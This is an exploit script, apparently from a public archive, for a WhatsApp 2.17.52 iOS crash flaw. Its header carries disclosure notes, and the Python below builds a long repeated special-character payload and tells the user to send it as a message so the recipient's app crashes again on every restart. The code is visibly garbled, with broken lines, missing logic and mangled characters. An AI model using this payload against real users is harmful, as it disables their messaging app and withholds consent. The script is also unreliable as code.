# -*- coding: utf-8 -*-
# Found this and more exploits on my open source security project:
# Exploit Author: Juan Sacco <firstname.lastname@example.org> at KPN Red Team -
# Date and time of release: 11 October 2017
# Tested on: iPhone 5/6s iOS 10.3.3 and 11
# WhatsApp 2.17.52 and prior is prone to a remote memory corruption.
# This type of attacks are possible if the program uses memory
inefficiently and does not impose limits on the amount of state used
# Resource exhaustion attacks exploit a design deficiency. An attacker
could exploit this vulnerability to remotely corrupt the memory of the
application forcing an uhandled exception
# in the context of the application that could potentially result in a
denial-of-service condition and/or remote memory corruption.
# Warning note:
# Once a user receives the offending message it will automatically
crash the application and if its restarted it will crash again until
the message its manually removed from the user's history.
# 09/13/2017 - Research started
# 09/13/2017 - First proof of concept
# 09/15/2017 - Reported to Whatsapp
# 09/20/2017 - Report Triaged by Facebook
# 11/01/2017 - Facebook never replied back with a status fix
# 11/01/2017 - Disclosure as zero day
# Vendor homepage: http://www.whatsapp.com
payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 1337
sutf8 = payload.encode('UTF-8')
print "[*] Writing to file: " + filename
print "[*] Done."
print "Usage: whatsapp.py [FILENAME]"
print "[*] Mandatory arguments:"
print "[-] FILENAME"
if __name__ == "__main__":
print "[*] WhatsApp 2.17.52 iOS - Remote memory corruption by
print "[*] How to use: Copy the content of the file and send
it as a message to another whatsapp user or group"